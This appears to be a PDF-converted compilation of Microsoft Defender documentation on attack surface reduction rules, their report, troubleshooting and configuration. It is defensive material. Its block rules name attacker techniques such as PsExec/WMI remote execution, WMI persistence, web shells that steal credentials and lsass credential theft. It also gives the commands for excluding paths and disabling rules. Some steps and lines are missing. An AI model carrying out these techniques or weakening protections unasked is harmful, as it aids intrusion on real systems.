Intune name: Process creation from Office communication products (beta)
Configuration Manager name: Not available
GUID: 26190899-1602-49e8-8b27-eb1d0a1ce869
AsrOfficeCommAppChildProcessAudited
AsrOfficeCommAppChildProcessBlocked
Block persistence through WMI event subscription

This rule prevents malware from abusing WMI to attain persistence on a device.
） Important
File and folder exclusions don't apply to this attack surface reduction rule.
Fileless threats employ various tactics to stay hidden, to avoid being seen in the file
system, and to gain periodic execution control. Some threats can abuse the WMI
repository and event model to stay hidden.
Intune name: Persistence through WMI event subscription
Configuration Manager name: Not available
GUID: e6db77e5-3df2-4cf1-b95a-636979351e5b
AsrPersistenceThroughWmiAudited
AsrPersistenceThroughWmiBlocked
Dependencies: Microsoft Defender Antivirus, RPC
Block process creations originating from PSExec and WMI

commands
This rule blocks processes created through PsExec and WMI from running. Both PsExec
and WMI can remotely execute code. There's a risk of malware abusing functionality of
PsExec and WMI for command and control purposes, or to spread an infection
throughout an organization's network.
２ Warning
Only use this rule if you're managing your devices with Intune or another MDM
solution. This rule is incompatible with management through Microsoft Endpoint
Configuration Manager because this rule blocks WMI commands the
Configuration Manager client uses to function correctly.
Intune name: Process creation from PSExec and WMI commands
Configuration Manager name: Not applicable
GUID: d1e49aac-8f56-4280-b9ba-993a6d77406c
AsrPsexecWmiChildProcessAudited
AsrPsexecWmiChildProcessBlocked
Block rebooting machine in Safe Mode (preview)

This rule prevents the execution of commands to restart machines in Safe Mode.
Safe Mode is a diagnostic mode that only loads the essential files and drivers needed for
Windows to run. However, in Safe Mode, many security products are either disabled or
operate in a limited capacity, which allows attackers to further launch tampering
commands, or simply execute and encrypt all files on the machine. This rule blocks such
attacks by preventing processes from restarting machines in Safe Mode.
７ Note
This capability is currently in preview. Additional upgrades to improve efficacy are

under development.
Intune Name: [PREVIEW] Block rebooting machine in Safe Mode
GUID: 33ddedf1-c6e0-47cb-833e-de6133960387
Block untrusted and unsigned processes that run from

USB
With this rule, admins can prevent unsigned or untrusted executable files from running
from USB removable drives, including SD cards. Blocked file types include executable
files (such as .exe, .dll, or .scr)
） Important
Files copied from the USB to the disk drive will be blocked by this rule if and when
it's about to be executed on the disk drive.
Intune name: Untrusted and unsigned processes that run from USB
Configuration Manager name: Block untrusted and unsigned processes that run from
USB
GUID: b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4
AsrUntrustedUsbProcessAudited
AsrUntrustedUsbProcessBlocked
Block use of copied or impersonated system tools

(preview)
This rule blocks the use of executable files that are identified as copies of Windows
system tools. These files are either duplicates or impostors of the original system tools.
Some malicious programs may try to copy or impersonate Windows system tools to
avoid detection or gain privileges. Allowing such executable files can lead to potential
attacks. This rule prevents propagation and execution of such duplicates and imposters
of the system tools on Windows machines.
７ Note
This capability is currently in preview. Additional upgrades to improve efficacy are

under development.
Intune Name: [PREVIEW] Block use of copied or impersonated system tools
GUID: c0033c00-d16d-4114-a5a0-dc9b3a7d2ceb
Block Webshell creation for Servers

This rule blocks web shell script creation on Microsoft Server, Exchange Role.
A web shell script is a specifically crafted script that allows an attacker to control the
compromised server. A web shell may include functionalities such as receiving and
executing malicious commands, downloading and executing malicious files, stealing and
exfiltrating credentials and sensitive information, identifying potential targets etc.
Intune name: Block Webshell creation for Servers
GUID: a8f5898e-1dc8-49a9-9878-85004b8a61e6
Block Win32 API calls from Office macros

This rule prevents VBA macros from calling Win32 APIs.
Office VBA enables Win32 API calls. Malware can abuse this capability, such as calling
Win32 APIs to launch malicious shellcode without writing anything directly to disk.
Most organizations don't rely on the ability to call Win32 APIs in their day-to-day
functioning, even if they use macros in other ways.
Intune name: Win32 imports from Office macro code
Configuration Manager name: Block Win32 API calls from Office macros
GUID: 92e97fa1-2edf-4476-bdd6-9dd0b4dddc7b
AsrOfficeMacroWin32ApiCallsAudited
AsrOfficeMacroWin32ApiCallsBlocked
Dependencies: Microsoft Defender Antivirus, AMSI
Use advanced protection against ransomware

This rule provides an extra layer of protection against ransomware. It uses both client
and cloud heuristics to determine whether a file resembles ransomware. This rule
doesn't block files that have one or more of the following characteristics:
The file has already been found to be unharmful in the Microsoft cloud.
The file is a valid signed file.
The file is prevalent enough to not be considered as ransomware.
The rule tends to err on the side of caution to prevent ransomware.
７ Note
You must enable cloud-delivered protection to use this rule.
Intune name: Advanced ransomware protection
Configuration Manager name: Use advanced protection against ransomware
GUID: c1db55ab-c21a-4637-bb3f-a12568109d35
AsrRansomwareAudited
AsrRansomwareBlocked
Dependencies: Microsoft Defender Antivirus, Cloud Protection

See also
Attack surface reduction (ASR) rules report
 Tip
Feedback

Attack surface reduction rules report
Article • 03/27/2023
Applies to:

Platforms:
Windows
） Important
Some information relates to prereleased product which may be substantially

The attack surface reduction rules report provides information about the attack surface
reduction rules that are applied to devices in your organization. This report also provides
information about:
detected threats
blocked threats
devices that aren't configured to use the standard protection rules to block threats
Additionally, this report provides an easy-to-use interface that enables you to:
View threat detections

View the configuration of the ASR rules
Configure (add) exclusions
Easily activate basic protection by enabling the three most recommended ASR rules
with a single toggle
Drill down to gather detailed information
For more information about individual attack surface reduction rules, see Attack surface
reduction rules reference.
Prerequisites
） Important
To access the Attack surface reduction rules report, read permissions are required
for the Microsoft Defender portal. Access to this report granted by Microsoft Entra
roles, such as Security Global Admin or Security role, is being deprecated and will
be removed in April 2023. For Windows Server 2012 R2 and Windows Server 2016
to appear in the Attack surface reduction rules report, these devices must be
onboarded using the modern unified solution package. For more information, see
New functionality in the modern unified solution for Windows Server 2012 R2
and 2016.
Report access permissions

To access the Attack surface reduction rules report in the Microsoft 365 Security
dashboard, the following permissions are required:
ﾉ Expand table
Permission type Permission Permission display name
Application Machine.Read.All 'Read all machine profiles'
Delegated (work or school account) Machine.Read 'Read machine information'
To assign these permissions:
1. Sign in to Microsoft Defender XDR using account with Security administrator or

4. Select Edit.
5. In Edit role, on the General tab, in Role name, type a name for the role.
6. In Description type a brief summary of the role.
7. In Permissions, select View Data, and under View Data select Attack surface
reduction.
For more information about user role management, see Create and manage roles for
Navigation
To navigate to the summary cards for the attack surface reduction rules report
1. Open Microsoft Defender XDR portal.

2. In the left panel, clickReports, and in the main section, under Reports select
Security report.
3. Scroll down to Devices to find the Attack surface reduction rules summary cards.
The summary report cards for ASR rules are shown in the following figure.
ASR rules report summary cards

The ASR rules report summary is divided into two cards:
ASR rule detections summary card

ASR rule configuration summary card
ASR rules detections summary card

Shows a summary of the number of detected threats blocked by ASR rules.
Provides two 'action' buttons:
View detections - opens the Attack surface reduction rules > main Detections tab
Add exclusions - Opens the Attack surface reduction rules > main Exclusions tab

Clicking on the ASR rules detections link at the top of the card also opens the main
Attack surface reduction rules Detections tab.
ASR rules configuration summary card

The top section focuses on three recommended rules, which protect against common
attack techniques. This card shows current-state information about the computers in
your organization that have the following Three (ASR) standard protection rules set in
Block mode, Audit mode, or off (not configured).The Protect devices button will show
full configuration details for only the three rules; customers can quickly take action to
enable these rules.
The bottom section surfaces six rules based on the number of unprotected devices per
rule. The "View configuration" button surfaces all configuration details for all ASR rules.
The "Add exclusion" button shows the add exclusion page with all detected file/process
names listed for Security Operation Center (SOC) to evaluate. The Add exclusion page is
linked to Microsoft Intune.
Provides two 'action' buttons:
View configuration - opens the Attack surface reduction rules > main Detections
tab
Add exclusions - Opens the Attack surface reduction rules > main Exclusions tab
Clicking on the ASR rules configuration link at the top of the card also opens the main
Attack surface reduction rules Configuration tab.
Simplified standard protection option

The configuration summary card provides a button to Protect devices with the three
standard protection rules. At minimum, Microsoft recommends that you enable these
three attack surface reduction standard protection rules:
(lsass.exe)
Block persistence through Windows Management Instrumentation (WMI) event
subscription
To enable the three standard protection rules:
1. Select Protect devices. The main Configuration tab opens.

2. On the Configuration tab, Basic rules automatically toggles from All rules to
Standard protection rules enabled.
3. In the Devices list, select the devices for which you want the standard protection
rules to apply, and then select Save.
This card has two other navigation buttons:
View configuration - Opens the Attack surface reduction rules > main
Configuration tab.
Add exclusions - Opens the Attack surface reduction rules > main Exclusions tab.
Clicking on the ASR rules configuration link at the top of the card also opens the main
Attack surface reduction rules Configuration tab.
Attack surface reduction rules main tabs

While the ASR rules report summary cards are useful for getting quick summary of your
ASR rules status, the main tabs provide more in-depth, information with filtering and
configuration capabilities:
Detections tab
Configuration tab
Exclusions tab
Search capabilities
Search capability is added to Detection, Configuration, and Add exclusion main tabs.
With this capability, you can search by using device ID, file name, or process name.

Filtering
Filtering provides a way for you to specify what results are returned:
Date enables you to specify a date range for data results.

Filters
７ Note
When filtering by rule, the number of individual detected items listed in the lower
half of the report is currently limited to 200 rules. You can use Export to save the
full list of detections to Excel.
 Tip
As the filter currently functions in this release, every time you want to "group by",
you must first scroll down to last detection in the list to load the complete data set.
After you have loaded the complete data set, you can then launch the "sort by"
filtering. If you don't scroll down to last detection listed on every use or when
changing filtering options (for example, the ASR rules applied to the current filter
run), then results will be incorrect for any result that has more than one viewable
page of listed detections.

Attack surface reduction rules main detections tab

Audit Detections Shows how many threat detections were captured by rules set in
Audit mode.
Blocked Detections Shows how many threat detections were blocked by rules set
in Block mode.
Large, consolidated graph Shows blocked and audited detections.

The graphs provide detection data over the displayed date range, with the capability to
hover over a specific location to gather date-specific information.
The bottom section of the report lists detected threats - on a per-device basis - with the
following fields:
ﾉ Expand table
Field name Definition
Detected file The file determined to contain a possible or known threat
Detected on The date the threat was detected
Blocked/Audited? Whether the detecting rule for the specific event was in Block or Audit mode
Rule Which rule detected the threat
Source app The application that made the call to the offending "detected file"
Device The name of the device on which the Audit or Block event occurred
Device group The Active Directory group to which the device belongs
User The machine account responsible for the call
Publisher The company that released the particular .exe or application
For more information about ASR rule audit and block modes, see Attack surface
reduction rule modes.
Actionable flyout
The "Detection" main page has a list of all detections (files/processes) in the last 30
days. Select on any of the detections to open with drill-down capabilities.
The Possible exclusion and impact section provides impact of the selected file or
process. You can:
Select Go hunt which opens the Advanced Hunting query page

Open file page opens Microsoft Defender for Endpoint detection
The Add exclusion button is linked with the add exclusion main page.
The following image illustrates how the Advanced Hunting query page opens from the
link on the actionable flyout:

For more information about Advanced hunting, see Proactively hunt for threats with
advanced hunting in Microsoft Defender XDR
Attack surface reduction rules main Configuration tab

The ASR rules main Configuration tab provides summary and per-device ASR rules
configuration details. There are three main aspects to the Configuration tab:
Basic rules Provides a method to toggle results between Basic rules and All Rules. By
default, Basic rules is selected.
Device configuration overview Provides a current snapshot of devices in one of the

following states:
All exposed Devices (devices with missing prerequisites, rules in Audit mode,
misconfigured rules, or rules not configured)
Devices with rules not configured
Devices with rules in audit mode
Devices with rules in block mode
The lower, unnamed section of the Configuration tab provides a listing of the current
state of your devices (on a per-device basis):
Device (name)
Overall configuration (Whether any rules are on or all are off)
Rules in block mode (the number of rules per-device set to block)
Rules in audit mode (the number of rules in audit mode)
Rules turned off (rules that are turned off or aren't enabled)
Device ID (device GUID)
These elements are shown in the following figure.
To enable ASR rules:
1. Under Device, select the device or devices for which you want to apply ASR rules.
2. In the flyout window, verify your selections and then select Add to policy.
The Configuration tab and add rule flyout are shown in the following image.
[NOTE!] If you have devices that require that different ASR rules be applied, you
should configure those devices individually.

Attack surface reduction rules Add exclusions tab

The Add exclusions tab presents a ranked list of detections by file name and provides a
method to configure exclusions. By default, Add exclusions information is listed for
three fields:
File name The name of the file that triggered the ASR rules event.
Detections The total number of detected events for named file. Individual devices
can trigger multiple ASR rules events.
Devices The number of devices on which the detection occurred.

） Important
Excluding files or folders can severely reduce the protection provided by ASR rules.
Excluded files are allowed to run, and no report or event will be recorded. If ASR
rules are detecting files that you believe shouldn't be detected, you should use
audit mode first to test the rule.
When you select a file, a Summary & expected impact fly out opens, presenting the
following types of information:
Files selected The number of files you've selected for exclusion

(number of) detections States the expected reduction in detections after adding
the selected exclusion(s). The reduction in detections is represented graphically for
Actual detections and Detections after exclusions
(number of) affected devices States the expected reduction in devices that report
detections for the selected exclusions.
The Add exclusion page has two buttons for actions that can be used on any detected
files (after selection). You can:
Add exclusion which will open Microsoft Intune ASR policy page. For more
information, see: Intune in "Enable ASR rules alternate configuration methods."
Get exclusion paths which will download file paths in a csv format
See also
Attack surface reduction (ASR) rules report
 Tip
Feedback

Report and troubleshoot Defender for
Endpoint attack surface reduction rules
Article • 02/16/2024
Applies to:

The Microsoft Defender portal is the new interface for monitoring and managing
security across your Microsoft identities, data, devices, apps, and infrastructure. Here
you can easily view the security health of your organization, act to configure devices,
users, and apps, and get alerts for suspicious activity. The Microsoft Defender portal is
intended for security admins and security operations teams to better manage and
protect their organization. Visit the Microsoft Defender portal
at https://security.microsoft.com .
In Microsoft Defender portal , we offer you a complete look at the current attack
surface reduction rules configuration and events in your estate. Your devices must be
onboarded into the Microsoft Defender for Endpoint service for these reports to be
populated. Here's a screenshot from the Microsoft Defender portal (under Reports >
Devices > Attack surface reduction). At the device level, select Configuration from the
Attack surface reduction rules pane. The following screen is displayed, where you can
select a specific device and check its individual attack surface reduction rule
configuration.

Microsoft Defender for Endpoint - Advanced

hunting
One of the most powerful features of Microsoft Defender for Endpoint is advanced
hunting. If you're unfamiliar with advanced hunting, refer proactively hunt for threats
with advanced hunting.
Advanced hunting is a query-based (Kusto Query Language) threat-hunting tool that

lets you explore up to 30 days of the captured (raw) data, that Defender for Endpoint
collects from your devices. Through advanced hunting, you can proactively inspect
events to locate interesting indicators and entities. The flexible access to data helps
unconstrained hunting for both known and potential threats.
Through advanced hunting, it's possible to extract attack surface reduction rules
information, create reports, and get in-depth information on the context of a given
attack surface reduction rule audit or block event.
Attack surface reduction rules events are available to be queried from the DeviceEvents
table in the advanced hunting section of the Microsoft Defender XDR. For example, a
simple query such as the one below can report all the events that have attack surface
reduction rules as data source, for the last 30 days, and will summarize them by the
ActionType count, that in this case it is the actual codename of the attack surface
reduction rule.
Kusto
DeviceEvents
| where ActionType startswith "Asr"
| summarize EventCount=count() by ActionType
With advanced hunting you can shape the queries to your liking, so that you can see
what is happening, regardless of whether you want to pinpoint something on an
individual machine, or you want to extract insights from your entire environment.
Microsoft Defender for Endpoint machine

timeline
An alternative to advanced hunting, but with a narrower scope, is the Microsoft
Defender for Endpoint machine timeline. You can view all the collected events of a
device, for the past six months, in the Microsoft Defender XDR, by going to the
Machines list, select a given machine, and then select on the Timeline tab.
The following screenshot shows the Timeline view of these events on a given endpoint.
From this view, you can filter the events list based on any of the Event Groups along the
right-side pane. You can also enable or disable Flagged and Verbose events while
viewing alerts and scrolling through the historical timeline.

How to troubleshoot attack surface reduction

rules?
The first and most immediate way is to check locally, on a Windows device, which attack
surface reduction rules are enabled (and their configuration) is by using the PowerShell
cmdlets.
Here are a few other sources of information that Windows offers, to troubleshoot attack
surface reduction rules' impact and operation.
Querying which rules are active

One of the easiest ways to determine if attack surface reduction rules are already
enabled is through a PowerShell cmdlet, Get-MpPreference.
Here's an example:
There are multiple attack surface reduction rules active, with different configured
actions.
To expand the above information on attack surface reduction rules, you can use the
properties AttackSurfaceReductionRules_Ids and/or
AttackSurfaceReductionRules_Actions.
Example:
PowerShell
Get-MPPreference | Select-Object -ExpandProperty

AttackSurfaceReductionRules_Ids
The above shows all the IDs for attack surface reduction rules that have a setting
different from 0 (Not Configured).
The next step is then to list the actual actions (Block or Audit) that each rule is
configured with.
PowerShell
Get-MPPreference | Select-Object -ExpandProperty

AttackSurfaceReductionRules_Actions
Querying blocking and auditing events

attack surface reduction rule events can be viewed within the Windows Defender log.
To access it, open Windows Event Viewer, and browse to Applications and Services
Logs > Microsoft > Windows > Windows Defender > Operational.
Microsoft Defender Antimalware Protection

Logs
You can also view rule events through the Microsoft Defender Antivirus dedicated
command-line tool, called *mpcmdrun.exe* , that can be used to manage and configure,
and automate tasks if needed.
You can find this utility in %ProgramFiles%\Windows Defender\MpCmdRun.exe. You must

run it from an elevated command prompt (that is, run as Admin).
To generate the support information, type MpCmdRun.exe -getfiles. After a while, several
logs will be packaged into an archive (MpSupportFiles.cab) and made available in
C:\ProgramData\Microsoft\Windows Defender\Support.
Extract that archive and you'll have many files available for troubleshooting purposes.
The most relevant files are as follows:

MPOperationalEvents.txt: This file contains same level of information found in
Event Viewer for Windows Defender's Operational log.
MPRegistry.txt: In this file you can analyze all the current Windows Defender
configurations, from the moment the support logs were captured.
MPLog.txt: This log contains more verbose information about all the
actions/operations of the Windows Defender.
 Tip
Feedback

Article • 02/13/2024
Applies to:

Platforms
Windows
 Tip
Attack surface reduction rules help prevent actions that malware often abuses to
compromise devices and networks.
Requirements
Attack surface reduction features across Windows versions
You can set attack surface reduction rules for devices that are running any of the
following editions and versions of Windows:
Windows 11 Pro
Windows 10 Pro, version 1709 or later
Windows 10 Enterprise, version 1709 or later
Windows Server, version 1803 (Semi-Annual Channel) or later
Windows Server 2016
Windows Server 2019
Windows Server 2022
To use the entire feature-set of attack surface reduction rules, you need:
Microsoft Defender Antivirus as primary AV (real-time protection on)

Cloud-Delivery Protection on (some rules require that)
Windows 10 Enterprise E5 or E3 License
Although attack surface reduction rules don't require a Windows E5 license, with a
Windows E5 license, you get advanced management capabilities including monitoring,
analytics, and workflows available in Defender for Endpoint, as well as reporting and
configuration capabilities in the Microsoft Defender XDR portal. These advanced
capabilities aren't available with an E3 license, but you can still use Event Viewer to
review attack surface reduction rule events.
Each attack surface reduction rule contains one of four settings:
Not configured | Disabled: Disable the attack surface reduction rule

Block: Enable the attack surface reduction rule
Audit: Evaluate how the attack surface reduction rule would impact your
organization if enabled
Warn: Enable the attack surface reduction rule but allow the end user to bypass
the block
We recommend using attack surface reduction rules with a Windows E5 license (or
similar licensing SKU) to take advantage of the advanced monitoring and reporting
capabilities available in Microsoft Defender for Endpoint (Defender for Endpoint).
However, if you have another license, such as Windows Professional or Windows E3 that
doesn't include advanced monitoring and reporting capabilities, you can develop your
own monitoring and reporting tools on top of the events that are generated at each
endpoint when attack surface reduction rules are triggered (for example, Event
Forwarding).
 Tip
To learn more about Windows licensing, see Windows 10 Licensing and get the
Volume Licensing guide for Windows 10 .
You can enable attack surface reduction rules by using any of these methods:
Microsoft Intune
Mobile Device Management (MDM)
Group Policy
PowerShell
Enterprise-level management such as Intune or Microsoft Configuration Manager is

recommended. Enterprise-level management overwrites any conflicting Group Policy or
PowerShell settings on startup.
Exclude files and folders from attack surface
reduction rules
You can exclude files and folders from being evaluated by most attack surface reduction
rules. This means that even if an attack surface reduction rule determines the file or
folder contains malicious behavior, it doesn't block the file from running.
） Important
Excluding files or folders can severely reduce the protection provided by attack
surface reduction rules. Excluded files will be allowed to run, and no report or event
will be recorded. If attack surface reduction rules are detecting files that you believe
shouldn't be detected, you should use audit mode first to test the rule. An
exclusion is applied only when the excluded application or service starts. For
example, if you add an exclusion for an update service that is already running, the
update service continues to trigger events until the service is stopped and
restarted.
When adding exclusions, keep these points in mind:
Exclusions are typically based on individual files or folders (using folder paths or
the full path of the file to be excluded).
Exclusion paths can use environment variables and wildcards. See Use wildcards in
the file name and folder path or extension exclusion lists
When deployed through Group Policy or PowerShell, exclusions apply to all attack
surface reduction rules. Using Intune, it is possible to configure an exclusion for a
specific attack surface reduction rule. See Configure attack surface reduction rules
per-rule exclusions
Exclusions can be added based on certificate and file hashes, by allowing specified
Defender for Endpoint file and certificate indicators. See Manage indicators.
Policy Conflict
1. If a conflicting policy is applied via MDM and GP, the setting applied from GP takes
precedence.
2. Attack surface reduction rules for managed devices now support behavior for
merger of settings from different policies, to create a superset of policy for each
device. Only the settings that aren't in conflict are merged, while those that are in
conflict aren't added to the superset of rules. Previously, if two policies included
conflicts for a single setting, both policies were flagged as being in conflict, and no
settings from either profile would be deployed. Attack surface reduction rule
merge behavior is as follows:
Attack surface reduction rules from the following profiles are evaluated for
each device to which the rules apply:
Devices > Configuration profiles > Endpoint protection profile > Microsoft
Defender Exploit Guard > Attack Surface Reduction.
Endpoint security > Attack surface reduction policy > Attack surface
reduction rules.
Endpoint security > Security baselines > Microsoft Defender ATP Baseline
> Attack Surface Reduction Rules.
Settings that don't have conflicts are added to a superset of policy for the
device.
When two or more policies have conflicting settings, the conflicting settings
aren't added to the combined policy, while settings that don't conflict are
added to the superset policy that applies to a device.
Only the configurations for conflicting settings are held back.
Configuration methods
This section provides configuration details for the following configuration methods:
Intune
Custom profile in Intune
MDM
Group Policy
PowerShell
The following procedures for enabling attack surface reduction rules include instructions
for how to exclude files and folders.
Intune
Device Configuration Profiles

1. Select Device configuration > Profiles. Choose an existing endpoint protection
profile or create a new one. To create a new one, select Create profile and enter
information for this profile. For Profile type, select Endpoint protection. If you've
chosen an existing profile, select Properties and then select Settings.
2. In the Endpoint protection pane, select Windows Defender Exploit Guard, then
select Attack Surface Reduction. Select the desired setting for each attack surface
reduction rule.
3. Under Attack Surface Reduction exceptions, enter individual files and folders. You
can also select Import to import a CSV file that contains files and folders to
exclude from attack surface reduction rules. Each line in the CSV file should be
formatted as follows:
C:\folder , %ProgramFiles%\folder\file , C:\path
4. Select OK on the three configuration panes. Then select Create if you're creating a
new endpoint protection file or Save if you're editing an existing one.
Endpoint security policy

1. Select Endpoint Security > Attack surface reduction. Choose an existing attack
surface reduction rule or create a new one. To create a new one, select Create
Policy and enter information for this profile. For Profile type, select Attack surface
reduction rules. If you've chosen an existing profile, select Properties and then
select Settings.
2. In the Configuration settings pane, select Attack Surface Reduction and then
select the desired setting for each attack surface reduction rule.
3. Under List of additional folders that need to be protected, List of apps that have
access to protected folders, and Exclude files and paths from attack surface
reduction rules, enter individual files and folders. You can also select Import to
import a CSV file that contains files and folders to exclude from attack surface
reduction rules. Each line in the CSV file should be formatted as follows:
C:\folder , %ProgramFiles%\folder\file , C:\path
4. Select Next on the three configuration panes, then select Create if you're creating
a new policy or Save if you're editing an existing policy.
Custom profile in Intune

You can use Microsoft Intune OMA-URI to configure custom attack surface reduction
rules. The following procedure uses the rule Block abuse of exploited vulnerable signed
drivers for the example.
1. Open the Microsoft Intune admin center. In the Home menu, click Devices, select
Configuration profiles, and then click Create profile.
2. In Create a profile, in the following two drop-down lists, select the following:
In Platform, select Windows 10 and later

In Profile type, select Templates
If attack surface reduction rules are already set through Endpoint security, in
Profile type, select Settings Catalog.
Select Custom, and then select Create.


3. The Custom template tool opens to step 1 Basics. In 1 Basics, in Name, type a
name for your template, and in Description you can type a description (optional).
4. Click Next. Step 2 Configuration settings opens. For OMA-URI Settings, click Add.
Two options now appear: Add and Export.

5. Click Add again. The Add Row OMA-URI Settings opens. In Add Row, do the
following:
In Name, type a name for the rule.
In Description, type a brief description.
In OMA-URI, type or paste the specific OMA-URI link for the rule that you're
adding. Refer to the MDM section in this article for the OMA-URI to use for
this example rule. For attack surface reduction rule GUIDS, see Per rule
descriptions in the article: Attack surface reduction rules.
In Data type, select String.
In Value, type or paste the GUID value, the = sign and the State value with no
spaces (GUID=StateValue). Where:
0: Disable (Disable the attack surface reduction rule)
1: Block (Enable the attack surface reduction rule)
2: Audit (Evaluate how the attack surface reduction rule would impact your
organization if enabled)
6: Warn (Enable the attack surface reduction rule but allow the end-user to
bypass the block)

6. Select Save. Add Row closes. In Custom, select Next. In step 3 Scope tags, scope
tags are optional. Do one of the following:
Select Select Scope tags, select the scope tag (optional) and then select
Next.
Or select Next
7. In step 4 Assignments, in Included Groups, for the groups that you want this rule
to apply, select from the following options:
Add groups
Add all users
Add all devices

8. In Excluded groups, select any groups that you want to exclude from this rule, and
then select Next.
9. In step 5 Applicability Rules for the following settings, do the following:
In Rule, select either Assign profile if, or Don't assign profile if
In Property, select the property to which you want this rule to apply
In Value, enter the applicable value or value range
10. Select Next. In step 6 Review + create, review the settings and information you've
selected and entered, and then select Create.

Rules are active and live within minutes.
７ Note
Conflict handling:
If you assign a device two different attack surface reduction policies, potential
policy conflicts can occur, depending on whether rules are assigned different states,
whether conflict management is in place, and whether the result is an error.
Nonconflicting rules do not result in an error, and such rules are applied correctly.
The first rule is applied, and subsequent nonconflicting rules are merged into the
policy.
MDM
Use the ./Vendor/MSFT/Policy/Config/Defender/AttackSurfaceReductionRules
configuration service provider (CSP) to individually enable and set the mode for each
rule.
The following is a sample for reference, using GUID values for Attack surface reduction
rules reference.
OMA-URI path: ./Vendor/MSFT/Policy/Config/Defender/AttackSurfaceReductionRules
Value: 75668c1f-73b5-4cf0-bb93-3ecf5cb7cc84=2|3b576869-a4ec-4529-8536-
b80a7769e899=1|d4f940ab-401b-4efc-aadc-ad5f3c50688a=2|d3e037e1-3eb8-44c8-a917-
57927947596d=1|5beb7efe-fd9a-4556-801d-275e5ffc04cc=0|be9ba2d9-53ea-4cdc-84e5-
9b1eeee46550=1
The values to enable (Block), disable, warn, or enable in audit mode are:

6: Warn (Enable the attack surface reduction rule but allow the end-user to bypass
the block). Warn mode is available for most of the attack surface reduction rules.
Use the ./Vendor/MSFT/Policy/Config/Defender/AttackSurfaceReductionOnlyExclusions

configuration service provider (CSP) to add exclusions.
Example:
OMA-URI path:
./Vendor/MSFT/Policy/Config/Defender/AttackSurfaceReductionOnlyExclusions
Value: c:\path|e:\path|c:\Exclusions.exe
７ Note
Be sure to enter OMA-URI values without spaces.

1. In Microsoft Configuration Manager, go to Assets and Compliance > Endpoint
Protection > Windows Defender Exploit Guard.
2. Select Home > Create Exploit Guard Policy.
3. Enter a name and a description, select Attack Surface Reduction, and select Next.
4. Choose which rules will block or audit actions and select Next.
5. Review the settings and select Next to create the policy.
6. After the policy is created, select Close.
２ Warning
There is a known issue with the applicability of Attack Surface Reduction on Server
OS versions which is marked as compliant without any actual enforcement.
Currently, there is no ETA for when this will be fixed.
Group Policy
２ Warning
If you manage your computers and devices with Intune, Configuration Manager, or
other enterprise-level management platform, the management software will
overwrite any conflicting Group Policy settings on startup.
Edit.
2. In the Group Policy Management Editor, go to Computer configuration and

select Administrative templates.
Microsoft Defender Exploit Guard > Attack surface reduction.
4. Select Configure Attack surface reduction rules and select Enabled. You can then
set the individual state for each rule in the options section. Select Show... and enter
the rule ID in the Value name column and your chosen state in the Value column
as follows:

6: Warn (Enable the attack surface reduction rule but allow the end-user to
bypass the block)
5. To exclude files and folders from attack surface reduction rules, select the Exclude
files and paths from Attack surface reduction rules setting and set the option to
Enabled. Select Show and enter each file or folder in the Value name column.
Enter 0 in the Value column for each item.
２ Warning
Do not use quotes as they are not supported for either the Value name
column or the Value column. The rule ID should not have any leading or
trailing spaces.
PowerShell
２ Warning
If you manage your computers and devices with Intune, Configuration Manager, or
another enterprise-level management platform, the management software
overwrites any conflicting PowerShell settings on startup.
as administrator.
2. Type one of the following cmdlets. (For more information, such as rule ID, refer to
Attack surface reduction rules reference.)
ﾉ Expand table
Task PowerShell cmdlet
Enable attack surface Set-MpPreference -AttackSurfaceReductionRules_Ids <rule

reduction rules ID> -AttackSurfaceReductionRules_Actions Enabled
Enable attack surface Add-MpPreference -AttackSurfaceReductionRules_Ids <rule

reduction rules in audit ID> -AttackSurfaceReductionRules_Actions AuditMode
mode
Enable attack surface Add-MpPreference -AttackSurfaceReductionRules_Ids <rule

reduction rules in warn ID> -AttackSurfaceReductionRules_Actions Warn
mode
Enable attack surface Add-MpPreference -AttackSurfaceReductionRules_Ids

reduction Block abuse of 56a863a9-875e-4185-98a7-b882c64b5ce5 -
exploited vulnerable AttackSurfaceReductionRules_Actions Enabled
signed drivers
Turn off attack surface Add-MpPreference -AttackSurfaceReductionRules_Ids <rule

reduction rules ID> -AttackSurfaceReductionRules_Actions Disabled
） Important
You must specify the state individually for each rule, but you can combine
rules and states in a comma-separated list.
In the following example, the first two rules are enabled, the third rule is
disabled, and the fourth rule is enabled in audit mode: Set-MpPreference -
AttackSurfaceReductionRules_Ids <rule ID 1>,<rule ID 2>,<rule ID 3>,<rule
ID 4> -AttackSurfaceReductionRules_Actions Enabled, Enabled, Disabled,
AuditMode
You can also use the Add-MpPreference PowerShell verb to add new rules to the
existing list.
２ Warning
Set-MpPreference overwrites the existing set of rules. If you want to add to
the existing set, use Add-MpPreference instead. You can obtain a list of rules
and their current state by using Get-MpPreference .
3. To exclude files and folders from attack surface reduction rules, use the following
cmdlet:
Add-MpPreference -AttackSurfaceReductionOnlyExclusions "<fully qualified path
or resource>"
Continue to use Add-MpPreference -AttackSurfaceReductionOnlyExclusions to add

more files and folders to the list.
） Important
Related articles
Evaluate attack surface reduction
 Tip
Feedback
frequently asked questions (FAQ)
FAQ
Applies to:

Is attack surface reduction part of

Windows?
Attack surface reduction was originally a feature of the suite of exploit guard features
introduced as a major update to Microsoft Defender Antivirus, in Windows 10, version
1709. Microsoft Defender Antivirus is the native antimalware component of Windows.
However, the full attack surface reduction feature-set is only available with a Windows
enterprise license. Also note that some Microsoft Defender Antivirus exclusions are
applicable to attack surface reduction rule exclusions. See Attack surface reduction rules
reference - Microsoft Defender Antivirus exclusions and attack surface reduction rules.
Do I need to have an enterprise license

to run attack surface reduction rules?
The full set of attack surface reduction rules and features is only supported if you have
an enterprise license for Windows 10 or Windows 11. A limited number of rules may
work without an enterprise license. If you have Microsoft 365 Business, set Microsoft
Defender Antivirus as your primary security solution, and enable the rules through
PowerShell. Using attack surface reduction without an enterprise license isn't officially
supported and you won't be able to use the full capabilities of attack surface reduction.
To learn more about Windows licensing, see Windows 10 Licensing and get the
Volume Licensing guide for Windows 10 .
Is attack surface reduction supported if
I have an E3 license?
Yes. Attack surface reduction is supported for Windows Enterprise E3 and above.
Which features are supported with an

E5 license?
All of the rules supported with E3 are also supported with E5.
E5 adds greater integration with Defender for Endpoint. With E5, you can view alerts in
real-time, fine-tune rule exclusions, configure attack surface reduction rules, and view
lists of event reports.
What are the currently supported attack

surface reduction rules?
Attack surface reduction currently supports all of the rules below.
What rules to enable? All, or can I turn

on individual rules?
To help you figure out what's best for your environment, we recommended that you
enable attack surface reduction rules in audit mode. With this approach, you can
determine the possible effect to your organization. For example, your line-of-business
applications.
How do attack surface reduction rules

exclusions work?
